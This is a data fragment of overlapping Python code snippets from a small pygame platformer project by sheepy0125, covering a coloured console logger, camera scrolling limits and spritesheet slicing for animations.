"scroll_y: float = 0 max_scroll_x: float = 0 max_scroll_y: float = 0 @staticmethod", "of columns rows is number of rows \"\"\" spritesheet = pygame.image.load(image_path) sprite_width =", "= sprites[i] def add_extra_sprites(self): for i in self.dict: 
copied_sprites = self.dict[i].copy() squashed_sprites =", "column that its on by the width x_pos = col_num * sprite_width row_images", "= Scrolling.max_scroll_x # Y axis if Scrolling.scroll_y <= 0: Scrolling.scroll_y = 0 elif", "\"\"\" spritesheet = pygame.image.load(image_path) sprite_width = spritesheet.get_width() / cols sprite_height = spritesheet.get_height() /", "def update_scrolling(player_pos, scroll_offset): \"\"\"Update scrolling\"\"\" # Center player Scrolling.scroll_x += ( player_pos[0] -", "pygame.image.load(image_path) sprite_width = spritesheet.get_width() / cols sprite_height = spritesheet.get_height() / rows empty_image =", "= pygame.Surface((sprite_width,sprite_height)).get_buffer().raw rows = [] # loop through the number of columns for", "in range(rows): # loop through the number of rows y_pos = row_num *", "str): print(f\"{Logger.colors['log']}[INFO] {message}{Logger.colors['normal']}\") @staticmethod def warn(message: str): print(f\"{Logger.colors['warn']}[WARN] {message}{Logger.colors['normal']}\") @staticmethod def fatal(message: str):", "for i in self.dict: copied_sprites = self.dict[i].copy() squashed_sprites = [] stretched_sprites = []", "rows = [] # loop through the number of columns for col_num in", "cols sprite_height = spritesheet.get_height() / rows empty_image = pygame.Surface((sprite_width,sprite_height)).get_buffer().raw rows = [] #", "axis if Scrolling.scroll_x <= 0: Scrolling.scroll_x = 0 elif Scrolling.scroll_x >= Scrolling.max_scroll_x: Scrolling.scroll_x", "= spritesheet.get_height() / rows empty_image = pygame.Surface((sprite_width,sprite_height)).get_buffer().raw rows = [] # loop through", "Scrolling.max_scroll_x # Y axis if Scrolling.scroll_y <= 0: Scrolling.scroll_y = 0 elif Scrolling.scroll_y", "cols, rows): \"\"\" get the images from the spritesheet cols is number of", "rows is number of rows \"\"\" spritesheet = pygame.image.load(image_path) sprite_width = spritesheet.get_width() /", "def log_error(error: Exception): 
Logger.fatal( f\"{type(error).__name__}: {str(error)} (line {error.__traceback__.tb_lineno})\" ) ############################# ### Scroll handling", "= pygame.image.load(image_path) sprite_width = spritesheet.get_width() / cols sprite_height = spritesheet.get_height() / rows empty_image", "{message}{Logger.colors['normal']}\") @staticmethod def log_error(error: Exception): Logger.fatal( f\"{type(error).__name__}: {str(error)} (line {error.__traceback__.tb_lineno})\" ) ############################# ###", "= { \"log\": \"\\033[92m\", \"warn\": \"\\033[93m\", \"fatal\": \"\\033[91m\", \"normal\": \"\\033[0m\", } @staticmethod def", "width x_pos = col_num * sprite_width row_images = [] for row_num in range(rows):", "number of rows \"\"\" spritesheet = pygame.image.load(image_path) sprite_width = spritesheet.get_width() / cols sprite_height", "scroll_offset): \"\"\"Update scrolling\"\"\" # Center player Scrolling.scroll_x += ( player_pos[0] - Scrolling.scroll_x -", "empty_image = pygame.Surface((sprite_width,sprite_height)).get_buffer().raw rows = [] # loop through the number of columns", "/ rows empty_image = pygame.Surface((sprite_width,sprite_height)).get_buffer().raw rows = [] # loop through the number", "sheepy0125 02/10/2021 \"\"\" from pathlib import Path ############### ### Globals ### ############### ROOT_PATH:", "if Scrolling.scroll_x <= 0: Scrolling.scroll_x = 0 elif Scrolling.scroll_x >= Scrolling.max_scroll_x: Scrolling.scroll_x =", "# loop through the number of rows y_pos = row_num * sprite_height sprite_rect", "ease\"\"\" colors: dict = { \"log\": \"\\033[92m\", \"warn\": \"\\033[93m\", \"fatal\": \"\\033[91m\", \"normal\": \"\\033[0m\",", "Tools for Some Platformer Game Created by sheepy0125 02/10/2021 \"\"\" from pathlib import", "def fatal(message: str): print(f\"{Logger.colors['fatal']}[FAIL] {message}{Logger.colors['normal']}\") @staticmethod def log_error(error: Exception): Logger.fatal( f\"{type(error).__name__}: {str(error)} (line", "self.dict = 
self.load_dict(dict_names) def load_dict(self,dict_names): for i in range(len(sprites)): self.dict[dict_names[i]] = sprites[i] def", "Scrolling.max_scroll_y class Animations: def __init__(self,image_path,cols,rows,dict_names): self.sprites = self.get_images_from_spritesheet(image_path,cols,rows) self.dict = self.load_dict(dict_names) def load_dict(self,dict_names):", "Game Created by sheepy0125 02/10/2021 \"\"\" from pathlib import Path ############### ### Globals", "y_pos = row_num * sprite_height sprite_rect = (x_pos, y_pos, sprite_width, sprite_height) sprite =", "fatal(message: str): print(f\"{Logger.colors['fatal']}[FAIL] {message}{Logger.colors['normal']}\") @staticmethod def log_error(error: Exception): Logger.fatal( f\"{type(error).__name__}: {str(error)} (line {error.__traceback__.tb_lineno})\"", "02/10/2021 \"\"\" from pathlib import Path ############### ### Globals ### ############### ROOT_PATH: Path", "colors: dict = { \"log\": \"\\033[92m\", \"warn\": \"\\033[93m\", \"fatal\": \"\\033[91m\", \"normal\": \"\\033[0m\", }", "print(f\"{Logger.colors['log']}[INFO] {message}{Logger.colors['normal']}\") @staticmethod def warn(message: str): print(f\"{Logger.colors['warn']}[WARN] {message}{Logger.colors['normal']}\") @staticmethod def fatal(message: str): print(f\"{Logger.colors['fatal']}[FAIL]", "tile_size, screen_size): \"\"\"Setup scrolling\"\"\" Scrolling.max_scroll_x = (map_size[0] * tile_size) - (screen_size[0]) Scrolling.max_scroll_y =", "def __init__(self,image_path,cols,rows,dict_names): self.sprites = self.get_images_from_spritesheet(image_path,cols,rows) self.dict = self.load_dict(dict_names) def load_dict(self,dict_names): for i in", "# Center player Scrolling.scroll_x += ( player_pos[0] - Scrolling.scroll_x - scroll_offset[0] ) /", "rows empty_image = pygame.Surface((sprite_width,sprite_height)).get_buffer().raw rows = [] # loop through the number of", "Scrolling.max_scroll_y = (map_size[1] * tile_size) - (screen_size[1]) - 50 Logger.log( f\"Max 
scrolling: ({Scrolling.max_scroll_x},", ") / 10 Scrolling.scroll_y += ( player_pos[1] - Scrolling.scroll_y - scroll_offset[1] ) /", "### Globals ### ############### ROOT_PATH: Path = Path(__file__).parent.parent #################### ### Logger class ###", "row_num * sprite_height sprite_rect = (x_pos, y_pos, sprite_width, sprite_height) sprite = spritesheet.subsurface(sprite_rect) if", "scrolling\"\"\" Scrolling.max_scroll_x = (map_size[0] * tile_size) - (screen_size[0]) Scrolling.max_scroll_y = (map_size[1] * tile_size)", "Logger class ### #################### class Logger: \"\"\"Log messages with ease\"\"\" colors: dict =", "### Logger class ### #################### class Logger: \"\"\"Log messages with ease\"\"\" colors: dict", "in self.dict: copied_sprites = self.dict[i].copy() squashed_sprites = [] stretched_sprites = [] for i", "0 elif Scrolling.scroll_x >= Scrolling.max_scroll_x: Scrolling.scroll_x = Scrolling.max_scroll_x # Y axis if Scrolling.scroll_y", "# the column that its on by the width x_pos = col_num *", "get the x position of the sprite by multiplying # the column that", "float = 0 @staticmethod def setup_scrolling(map_size, tile_size, screen_size): \"\"\"Setup scrolling\"\"\" Scrolling.max_scroll_x = (map_size[0]", "Logger: \"\"\"Log messages with ease\"\"\" colors: dict = { \"log\": \"\\033[92m\", \"warn\": \"\\033[93m\",", "- (screen_size[1]) - 50 Logger.log( f\"Max scrolling: ({Scrolling.max_scroll_x}, {Scrolling.max_scroll_y})\" ) @staticmethod def update_scrolling(player_pos,", "<= 0: Scrolling.scroll_y = 0 elif Scrolling.scroll_y >= Scrolling.max_scroll_y: Scrolling.scroll_y = Scrolling.max_scroll_y class", "\"\"\" get the images from the spritesheet cols is number of columns rows", "= self.get_images_from_spritesheet(image_path,cols,rows) self.dict = self.load_dict(dict_names) def load_dict(self,dict_names): for i in range(len(sprites)): self.dict[dict_names[i]] =", "off the map # X axis if Scrolling.scroll_x <= 0: Scrolling.scroll_x = 0", 
"update_scrolling(player_pos, scroll_offset): \"\"\"Update scrolling\"\"\" # Center player Scrolling.scroll_x += ( player_pos[0] - Scrolling.scroll_x", "<= 0: Scrolling.scroll_x = 0 elif Scrolling.scroll_x >= Scrolling.max_scroll_x: Scrolling.scroll_x = Scrolling.max_scroll_x #", "the x position of the sprite by multiplying # the column that its", "Y axis if Scrolling.scroll_y <= 0: Scrolling.scroll_y = 0 elif Scrolling.scroll_y >= Scrolling.max_scroll_y:", "the map # X axis if Scrolling.scroll_x <= 0: Scrolling.scroll_x = 0 elif", "of rows \"\"\" spritesheet = pygame.image.load(image_path) sprite_width = spritesheet.get_width() / cols sprite_height =", "scrolling\"\"\" # Center player Scrolling.scroll_x += ( player_pos[0] - Scrolling.scroll_x - scroll_offset[0] )", "sprite_width = spritesheet.get_width() / cols sprite_height = spritesheet.get_height() / rows empty_image = pygame.Surface((sprite_width,sprite_height)).get_buffer().raw", "scroll_offset[0] ) / 10 Scrolling.scroll_y += ( player_pos[1] - Scrolling.scroll_y - scroll_offset[1] )", "stretched_sprites = [] for i in copied_sprites: squashed_sprite = pygame.transform.scale() squashed_sprites.append() stretched_sprites.append() def", "of rows y_pos = row_num * sprite_height sprite_rect = (x_pos, y_pos, sprite_width, sprite_height)", "Scrolling.scroll_y - scroll_offset[1] ) / 10 # Don't allow scrolling off the map", "@staticmethod def warn(message: str): print(f\"{Logger.colors['warn']}[WARN] {message}{Logger.colors['normal']}\") @staticmethod def fatal(message: str): print(f\"{Logger.colors['fatal']}[FAIL] {message}{Logger.colors['normal']}\") @staticmethod", "sprite by multiplying # the column that its on by the width x_pos", "Scrolling.scroll_y = 0 elif Scrolling.scroll_y >= Scrolling.max_scroll_y: Scrolling.scroll_y = Scrolling.max_scroll_y class Animations: def", "Don't allow scrolling off the map # X axis if Scrolling.scroll_x <= 0:", "# Don't allow scrolling off the map # X axis if Scrolling.scroll_x 
<=", "of columns for col_num in range(cols): # get the x position of the", "Logger.log( f\"Max scrolling: ({Scrolling.max_scroll_x}, {Scrolling.max_scroll_y})\" ) @staticmethod def update_scrolling(player_pos, scroll_offset): \"\"\"Update scrolling\"\"\" #", "f\"{type(error).__name__}: {str(error)} (line {error.__traceback__.tb_lineno})\" ) ############################# ### Scroll handling class ### ############################# class", "= self.dict[i].copy() squashed_sprites = [] stretched_sprites = [] for i in copied_sprites: squashed_sprite", "stretched_sprites.append() def get_images_from_spritesheet(image_path, cols, rows): \"\"\" get the images from the spritesheet cols", "log_error(error: Exception): Logger.fatal( f\"{type(error).__name__}: {str(error)} (line {error.__traceback__.tb_lineno})\" ) ############################# ### Scroll handling class", "position of the sprite by multiplying # the column that its on by", "= row_num * sprite_height sprite_rect = (x_pos, y_pos, sprite_width, sprite_height) sprite = spritesheet.subsurface(sprite_rect)", "#################### ### Logger class ### #################### class Logger: \"\"\"Log messages with ease\"\"\" colors:", "import Path ############### ### Globals ### ############### ROOT_PATH: Path = Path(__file__).parent.parent #################### ###", "Exception): Logger.fatal( f\"{type(error).__name__}: {str(error)} (line {error.__traceback__.tb_lineno})\" ) ############################# ### Scroll handling class ###", "rows \"\"\" spritesheet = pygame.image.load(image_path) sprite_width = spritesheet.get_width() / cols sprite_height = spritesheet.get_height()", "* sprite_height sprite_rect = (x_pos, y_pos, sprite_width, sprite_height) sprite = spritesheet.subsurface(sprite_rect) if sprite.get_buffer().raw", "by sheepy0125 02/10/2021 \"\"\" from pathlib import Path ############### ### Globals ### ###############", "self.dict[dict_names[i]] = sprites[i] def add_extra_sprites(self): for i in self.dict: 
copied_sprites = self.dict[i].copy() squashed_sprites", "on by the width x_pos = col_num * sprite_width row_images = [] for", "player_pos[0] - Scrolling.scroll_x - scroll_offset[0] ) / 10 Scrolling.scroll_y += ( player_pos[1] -", "Scrolling.scroll_x = Scrolling.max_scroll_x # Y axis if Scrolling.scroll_y <= 0: Scrolling.scroll_y = 0", "= [] for i in copied_sprites: squashed_sprite = pygame.transform.scale() squashed_sprites.append() stretched_sprites.append() def get_images_from_spritesheet(image_path,", "\"\"\" from pathlib import Path ############### ### Globals ### ############### ROOT_PATH: Path =", "= Path(__file__).parent.parent #################### ### Logger class ### #################### class Logger: \"\"\"Log messages with", "with ease\"\"\" colors: dict = { \"log\": \"\\033[92m\", \"warn\": \"\\033[93m\", \"fatal\": \"\\033[91m\", \"normal\":", "{message}{Logger.colors['normal']}\") @staticmethod def warn(message: str): print(f\"{Logger.colors['warn']}[WARN] {message}{Logger.colors['normal']}\") @staticmethod def fatal(message: str): print(f\"{Logger.colors['fatal']}[FAIL] {message}{Logger.colors['normal']}\")", "pygame.Surface((sprite_width,sprite_height)).get_buffer().raw rows = [] # loop through the number of columns for col_num", "\"\\033[0m\", } @staticmethod def log(message: str): print(f\"{Logger.colors['log']}[INFO] {message}{Logger.colors['normal']}\") @staticmethod def warn(message: str): print(f\"{Logger.colors['warn']}[WARN]", "images from the spritesheet cols is number of columns rows is number of", "the number of columns for col_num in range(cols): # get the x position", "i in copied_sprites: squashed_sprite = pygame.transform.scale() squashed_sprites.append() stretched_sprites.append() def get_images_from_spritesheet(image_path, cols, rows): \"\"\"", "map # X axis if Scrolling.scroll_x <= 0: Scrolling.scroll_x = 0 elif Scrolling.scroll_x", "f\"Max scrolling: ({Scrolling.max_scroll_x}, {Scrolling.max_scroll_y})\" ) @staticmethod def 
update_scrolling(player_pos, scroll_offset): \"\"\"Update scrolling\"\"\" # Center", "0 max_scroll_y: float = 0 @staticmethod def setup_scrolling(map_size, tile_size, screen_size): \"\"\"Setup scrolling\"\"\" Scrolling.max_scroll_x", "the images from the spritesheet cols is number of columns rows is number", "elif Scrolling.scroll_x >= Scrolling.max_scroll_x: Scrolling.scroll_x = Scrolling.max_scroll_x # Y axis if Scrolling.scroll_y <=", "float = 0 scroll_y: float = 0 max_scroll_x: float = 0 max_scroll_y: float", ") ############################# ### Scroll handling class ### ############################# class Scrolling: scroll_x: float =", "in copied_sprites: squashed_sprite = pygame.transform.scale() squashed_sprites.append() stretched_sprites.append() def get_images_from_spritesheet(image_path, cols, rows): \"\"\" get", "sprite_rect = (x_pos, y_pos, sprite_width, sprite_height) sprite = spritesheet.subsurface(sprite_rect) if sprite.get_buffer().raw == empty_image:", "# loop through the number of columns for col_num in range(cols): # get", "\"\\033[91m\", \"normal\": \"\\033[0m\", } @staticmethod def log(message: str): print(f\"{Logger.colors['log']}[INFO] {message}{Logger.colors['normal']}\") @staticmethod def warn(message:", "- Scrolling.scroll_x - scroll_offset[0] ) / 10 Scrolling.scroll_y += ( player_pos[1] - Scrolling.scroll_y", "def get_images_from_spritesheet(image_path, cols, rows): \"\"\" get the images from the spritesheet cols is", "# Y axis if Scrolling.scroll_y <= 0: Scrolling.scroll_y = 0 elif Scrolling.scroll_y >=", "sprite_height = spritesheet.get_height() / rows empty_image = pygame.Surface((sprite_width,sprite_height)).get_buffer().raw rows = [] # loop", "+= ( player_pos[0] - Scrolling.scroll_x - scroll_offset[0] ) / 10 Scrolling.scroll_y += (", "allow scrolling off the map # X axis if Scrolling.scroll_x <= 0: Scrolling.scroll_x", "dict = { \"log\": \"\\033[92m\", \"warn\": \"\\033[93m\", \"fatal\": \"\\033[91m\", \"normal\": \"\\033[0m\", } 
@staticmethod", "Scrolling: scroll_x: float = 0 scroll_y: float = 0 max_scroll_x: float = 0", "class Scrolling: scroll_x: float = 0 scroll_y: float = 0 max_scroll_x: float =", "(screen_size[1]) - 50 Logger.log( f\"Max scrolling: ({Scrolling.max_scroll_x}, {Scrolling.max_scroll_y})\" ) @staticmethod def update_scrolling(player_pos, scroll_offset):", "{ \"log\": \"\\033[92m\", \"warn\": \"\\033[93m\", \"fatal\": \"\\033[91m\", \"normal\": \"\\033[0m\", } @staticmethod def log(message:", "tile_size) - (screen_size[1]) - 50 Logger.log( f\"Max scrolling: ({Scrolling.max_scroll_x}, {Scrolling.max_scroll_y})\" ) @staticmethod def", "self.dict[i].copy() squashed_sprites = [] stretched_sprites = [] for i in copied_sprites: squashed_sprite =", "__init__(self,image_path,cols,rows,dict_names): self.sprites = self.get_images_from_spritesheet(image_path,cols,rows) self.dict = self.load_dict(dict_names) def load_dict(self,dict_names): for i in range(len(sprites)):", "= (map_size[0] * tile_size) - (screen_size[0]) Scrolling.max_scroll_y = (map_size[1] * tile_size) - (screen_size[1])", "({Scrolling.max_scroll_x}, {Scrolling.max_scroll_y})\" ) @staticmethod def update_scrolling(player_pos, scroll_offset): \"\"\"Update scrolling\"\"\" # Center player Scrolling.scroll_x", "in range(cols): # get the x position of the sprite by multiplying #", "copied_sprites = self.dict[i].copy() squashed_sprites = [] stretched_sprites = [] for i in copied_sprites:", "str): print(f\"{Logger.colors['warn']}[WARN] {message}{Logger.colors['normal']}\") @staticmethod def fatal(message: str): print(f\"{Logger.colors['fatal']}[FAIL] {message}{Logger.colors['normal']}\") @staticmethod def log_error(error: Exception):", "of the sprite by multiplying # the column that its on by the", "Scrolling.scroll_y >= Scrolling.max_scroll_y: Scrolling.scroll_y = Scrolling.max_scroll_y class Animations: def __init__(self,image_path,cols,rows,dict_names): self.sprites = 
self.get_images_from_spritesheet(image_path,cols,rows)", "= spritesheet.get_width() / cols sprite_height = spritesheet.get_height() / rows empty_image = pygame.Surface((sprite_width,sprite_height)).get_buffer().raw rows", "= pygame.transform.scale() squashed_sprites.append() stretched_sprites.append() def get_images_from_spritesheet(image_path, cols, rows): \"\"\" get the images from", "squashed_sprites.append() stretched_sprites.append() def get_images_from_spritesheet(image_path, cols, rows): \"\"\" get the images from the spritesheet", "\"\\033[93m\", \"fatal\": \"\\033[91m\", \"normal\": \"\\033[0m\", } @staticmethod def log(message: str): print(f\"{Logger.colors['log']}[INFO] {message}{Logger.colors['normal']}\") @staticmethod", ") / 10 # Don't allow scrolling off the map # X axis", "spritesheet.get_width() / cols sprite_height = spritesheet.get_height() / rows empty_image = pygame.Surface((sprite_width,sprite_height)).get_buffer().raw rows =", "rows): \"\"\" get the images from the spritesheet cols is number of columns", "in range(len(sprites)): self.dict[dict_names[i]] = sprites[i] def add_extra_sprites(self): for i in self.dict: copied_sprites =", "- Scrolling.scroll_y - scroll_offset[1] ) / 10 # Don't allow scrolling off the", "screen_size): \"\"\"Setup scrolling\"\"\" Scrolling.max_scroll_x = (map_size[0] * tile_size) - (screen_size[0]) Scrolling.max_scroll_y = (map_size[1]", "the spritesheet cols is number of columns rows is number of rows \"\"\"", "10 # Don't allow scrolling off the map # X axis if Scrolling.scroll_x", "pygame.transform.scale() squashed_sprites.append() stretched_sprites.append() def get_images_from_spritesheet(image_path, cols, rows): \"\"\" get the images from the", "x position of the sprite by multiplying # the column that its on", "= 0 scroll_y: float = 0 max_scroll_x: float = 0 max_scroll_y: float =", "self.load_dict(dict_names) def load_dict(self,dict_names): for i in range(len(sprites)): self.dict[dict_names[i]] = sprites[i] def 
add_extra_sprites(self): for", "i in self.dict: copied_sprites = self.dict[i].copy() squashed_sprites = [] stretched_sprites = [] for", "loop through the number of columns for col_num in range(cols): # get the", "range(cols): # get the x position of the sprite by multiplying # the", "if Scrolling.scroll_y <= 0: Scrolling.scroll_y = 0 elif Scrolling.scroll_y >= Scrolling.max_scroll_y: Scrolling.scroll_y =", "row_num in range(rows): # loop through the number of rows y_pos = row_num", "self.get_images_from_spritesheet(image_path,cols,rows) self.dict = self.load_dict(dict_names) def load_dict(self,dict_names): for i in range(len(sprites)): self.dict[dict_names[i]] = sprites[i]", "0 @staticmethod def setup_scrolling(map_size, tile_size, screen_size): \"\"\"Setup scrolling\"\"\" Scrolling.max_scroll_x = (map_size[0] * tile_size)", "Path(__file__).parent.parent #################### ### Logger class ### #################### class Logger: \"\"\"Log messages with ease\"\"\"", "def setup_scrolling(map_size, tile_size, screen_size): \"\"\"Setup scrolling\"\"\" Scrolling.max_scroll_x = (map_size[0] * tile_size) - (screen_size[0])", "Scrolling.scroll_y += ( player_pos[1] - Scrolling.scroll_y - scroll_offset[1] ) / 10 # Don't", "max_scroll_y: float = 0 @staticmethod def setup_scrolling(map_size, tile_size, screen_size): \"\"\"Setup scrolling\"\"\" Scrolling.max_scroll_x =", "columns for col_num in range(cols): # get the x position of the sprite", "X axis if Scrolling.scroll_x <= 0: Scrolling.scroll_x = 0 elif Scrolling.scroll_x >= Scrolling.max_scroll_x:", ">= Scrolling.max_scroll_x: Scrolling.scroll_x = Scrolling.max_scroll_x # Y axis if Scrolling.scroll_y <= 0: Scrolling.scroll_y", "Some Platformer Game Created by sheepy0125 02/10/2021 \"\"\" from pathlib import Path ###############", "Path ############### ### Globals ### ############### ROOT_PATH: Path = Path(__file__).parent.parent #################### ### Logger", "spritesheet.get_height() / rows empty_image = 
pygame.Surface((sprite_width,sprite_height)).get_buffer().raw rows = [] # loop through the", "player Scrolling.scroll_x += ( player_pos[0] - Scrolling.scroll_x - scroll_offset[0] ) / 10 Scrolling.scroll_y", "Scrolling.max_scroll_x = (map_size[0] * tile_size) - (screen_size[0]) Scrolling.max_scroll_y = (map_size[1] * tile_size) -", "log(message: str): print(f\"{Logger.colors['log']}[INFO] {message}{Logger.colors['normal']}\") @staticmethod def warn(message: str): print(f\"{Logger.colors['warn']}[WARN] {message}{Logger.colors['normal']}\") @staticmethod def fatal(message:", "@staticmethod def setup_scrolling(map_size, tile_size, screen_size): \"\"\"Setup scrolling\"\"\" Scrolling.max_scroll_x = (map_size[0] * tile_size) -", "from pathlib import Path ############### ### Globals ### ############### ROOT_PATH: Path = Path(__file__).parent.parent", "- 50 Logger.log( f\"Max scrolling: ({Scrolling.max_scroll_x}, {Scrolling.max_scroll_y})\" ) @staticmethod def update_scrolling(player_pos, scroll_offset): \"\"\"Update" ]
[ "sys path = ['~'] def run() -> None: while True: input_value = input('LittleFather('", "interpret(args: list) -> bool: command = args[0] args = [] if len(args) ==", "args[0] args = [] if len(args) == 1 else args[1:] if command in", "Coms.commands: Coms.commands[command].execute(args) elif command == 'exit': return False else: print('unknown command') return True", "break def custom_input(): return input('> ') def interpret(args: list) -> bool: command =", "= ['~'] def run() -> None: while True: input_value = input('LittleFather(' + '/'.join(path)", "if command in Coms.commands: Coms.commands[command].execute(args) elif command == 'exit': return False else: print('unknown", "utf-8 import Coms import sys path = ['~'] def run() -> None: while", "if len(input_value) == 0: continue if not interpret(input_value): break def custom_input(): return input('>", "interpret(input_value): break def custom_input(): return input('> ') def interpret(args: list) -> bool: command", "= [] if len(args) == 1 else args[1:] if command in Coms.commands: Coms.commands[command].execute(args)", "') if len(input_value) == 0: continue if not interpret(input_value): break def custom_input(): return", "# coding: utf-8 import Coms import sys path = ['~'] def run() ->", "custom_input(): return input('> ') def interpret(args: list) -> bool: command = args[0] args", "+ '/'.join(path) + ') $ ').split(' ') if len(input_value) == 0: continue if", "$ ').split(' ') if len(input_value) == 0: continue if not interpret(input_value): break def", "import sys path = ['~'] def run() -> None: while True: input_value =", "def run() -> None: while True: input_value = input('LittleFather(' + '/'.join(path) + ')", "input('LittleFather(' + '/'.join(path) + ') $ ').split(' ') if len(input_value) == 0: continue", "len(input_value) == 0: continue if not interpret(input_value): break def custom_input(): return input('> ')", "path = ['~'] def run() -> None: while True: input_value = input('LittleFather(' +", "if not 
interpret(input_value): break def custom_input(): return input('> ') def interpret(args: list) ->", "if len(args) == 1 else args[1:] if command in Coms.commands: Coms.commands[command].execute(args) elif command", "bool: command = args[0] args = [] if len(args) == 1 else args[1:]", "list) -> bool: command = args[0] args = [] if len(args) == 1", "1 else args[1:] if command in Coms.commands: Coms.commands[command].execute(args) elif command == 'exit': return", "= args[0] args = [] if len(args) == 1 else args[1:] if command", "command in Coms.commands: Coms.commands[command].execute(args) elif command == 'exit': return False else: print('unknown command')", "continue if not interpret(input_value): break def custom_input(): return input('> ') def interpret(args: list)", "def custom_input(): return input('> ') def interpret(args: list) -> bool: command = args[0]", "-> None: while True: input_value = input('LittleFather(' + '/'.join(path) + ') $ ').split('", "== 1 else args[1:] if command in Coms.commands: Coms.commands[command].execute(args) elif command == 'exit':", "-> bool: command = args[0] args = [] if len(args) == 1 else", "else args[1:] if command in Coms.commands: Coms.commands[command].execute(args) elif command == 'exit': return False", "in Coms.commands: Coms.commands[command].execute(args) elif command == 'exit': return False else: print('unknown command') return", "not interpret(input_value): break def custom_input(): return input('> ') def interpret(args: list) -> bool:", "<gh_stars>1-10 #!/usr/local/bin/python # coding: utf-8 import Coms import sys path = ['~'] def", "') $ ').split(' ') if len(input_value) == 0: continue if not interpret(input_value): break", "None: while True: input_value = input('LittleFather(' + '/'.join(path) + ') $ ').split(' ')", "import Coms import sys path = ['~'] def run() -> None: while True:", "True: input_value = input('LittleFather(' + '/'.join(path) + ') $ ').split(' ') if len(input_value)", "args[1:] if command in 
Coms.commands: Coms.commands[command].execute(args) elif command == 'exit': return False else:", "coding: utf-8 import Coms import sys path = ['~'] def run() -> None:", "'/'.join(path) + ') $ ').split(' ') if len(input_value) == 0: continue if not", "').split(' ') if len(input_value) == 0: continue if not interpret(input_value): break def custom_input():", "def interpret(args: list) -> bool: command = args[0] args = [] if len(args)", "len(args) == 1 else args[1:] if command in Coms.commands: Coms.commands[command].execute(args) elif command ==", "== 0: continue if not interpret(input_value): break def custom_input(): return input('> ') def", "input('> ') def interpret(args: list) -> bool: command = args[0] args = []", "Coms import sys path = ['~'] def run() -> None: while True: input_value", "run() -> None: while True: input_value = input('LittleFather(' + '/'.join(path) + ') $", "['~'] def run() -> None: while True: input_value = input('LittleFather(' + '/'.join(path) +", "while True: input_value = input('LittleFather(' + '/'.join(path) + ') $ ').split(' ') if", "args = [] if len(args) == 1 else args[1:] if command in Coms.commands:", "= input('LittleFather(' + '/'.join(path) + ') $ ').split(' ') if len(input_value) == 0:", "#!/usr/local/bin/python # coding: utf-8 import Coms import sys path = ['~'] def run()", "') def interpret(args: list) -> bool: command = args[0] args = [] if", "0: continue if not interpret(input_value): break def custom_input(): return input('> ') def interpret(args:", "[] if len(args) == 1 else args[1:] if command in Coms.commands: Coms.commands[command].execute(args) elif", "return input('> ') def interpret(args: list) -> bool: command = args[0] args =", "command = args[0] args = [] if len(args) == 1 else args[1:] if", "+ ') $ ').split(' ') if len(input_value) == 0: continue if not interpret(input_value):", "input_value = input('LittleFather(' + '/'.join(path) + ') $ ').split(' ') if len(input_value) ==" ]
[]
[ "empties commands commands = open(\".swiftpage_commands\",\"w\") commands.write(\"\") commands.close() time.sleep(0.6) def addons_loop(): global addons_server addons_server.on_update()", "last_modified_time = modified_time os.system('python create_page.py') print(\"Page modified, new SwiftPage generated: \"+str(last_modified_time)) # refreshes", "creates dev_server.html dev_server_page = open(\"dev_server.html\",\"w\") dev_server_page.write(dev_page) dev_server_page.close() # defines custom HTTP handler class", "webbrowser.open('http://127.0.0.1:8080/dev_server.html', new=0, autoraise=True) print(\"SwiftPage server running, your site will now be automatically regenerated", "\"none\"; function loadCommands(filename) { $.get(filename, function(data, textStatus) { if (textStatus == 'success') {", "{ if (lastRefreshToken !== lines[i]) { lastRefreshToken = lines[i]; var iframe = document.getElementsByName('content_window')[0];", "addons_server addons_server.on_update() # removes existing commands file os.remove(\".swiftpage_commands\") # creates dev_server.html dev_server_page =", "import os import time import webbrowser import threading from addons.addons_server import * from", "margin: 0px;'> <iframe src='./site/index.html' name='content_window' style='width: 100%; height: 100%; outline: none;' frameborder='0'></iframe> </body>", "web browser and writes other commands commands = open(\".swiftpage_commands\",\"w\") commands.write(str(last_modified_time)) commands.close() else: #", "new SwiftPage generated: \"+str(last_modified_time)) # refreshes web browser and writes other commands commands", "'success') { var lines = data.match(/^.*((''' dev_page_middle = '\\\\'+'r'+'\\\\'+'n'+'|'+'\\\\'+'n'+'|'+'\\\\'+'r' dev_page_suffix = ''')|$)/gm) for", "local server webbrowser.open('http://127.0.0.1:8080/dev_server.html', new=0, autoraise=True) print(\"SwiftPage server running, your site will now be", "SwiftPage generated: \"+str(last_modified_time)) # refreshes web browser 
and writes other commands commands =", "as httpd: # opens web browser of local server webbrowser.open('http://127.0.0.1:8080/dev_server.html', new=0, autoraise=True) print(\"SwiftPage", "(var i = 0; i < lines.length; i++) { //console.log(lines[i]); // TODO: remove", "!== lines[i]) { lastRefreshToken = lines[i]; var iframe = document.getElementsByName('content_window')[0]; iframe.src = iframe.src", "{ console.log('Commands file does not exist.'); } }); } function checkForCommands() { var", "customHandler # http.server.SimpleHTTPRequestHandler t1 = threading.Thread(target=main_loop) t2 = threading.Thread(target=addons_loop) with socketserver.TCPServer((\"\", port), handler)", "other commands commands = open(\".swiftpage_commands\",\"w\") commands.write(str(last_modified_time)) commands.close() else: # empties commands commands =", "= customHandler # http.server.SimpleHTTPRequestHandler t1 = threading.Thread(target=main_loop) t2 = threading.Thread(target=addons_loop) with socketserver.TCPServer((\"\", port),", "iframe.src = iframe.src iframe.contentWindow.location.reload(true); //iframe.location.reload(true); } } } } else { console.log('Commands file", "lastRefreshToken = lines[i]; var iframe = document.getElementsByName('content_window')[0]; iframe.src = iframe.src iframe.contentWindow.location.reload(true); //iframe.location.reload(true); }", "autoraise=True) print(\"SwiftPage server running, your site will now be automatically regenerated when changes", "# defines custom HTTP handler class customHandler(http.server.SimpleHTTPRequestHandler): def log_message(self, format, *args): return #", "# removes existing commands file os.remove(\".swiftpage_commands\") # creates dev_server.html dev_server_page = open(\"dev_server.html\",\"w\") dev_server_page.write(dev_page)", "dev_server_page.write(dev_page) dev_server_page.close() # defines custom HTTP handler class customHandler(http.server.SimpleHTTPRequestHandler): def log_message(self, format, *args):", 
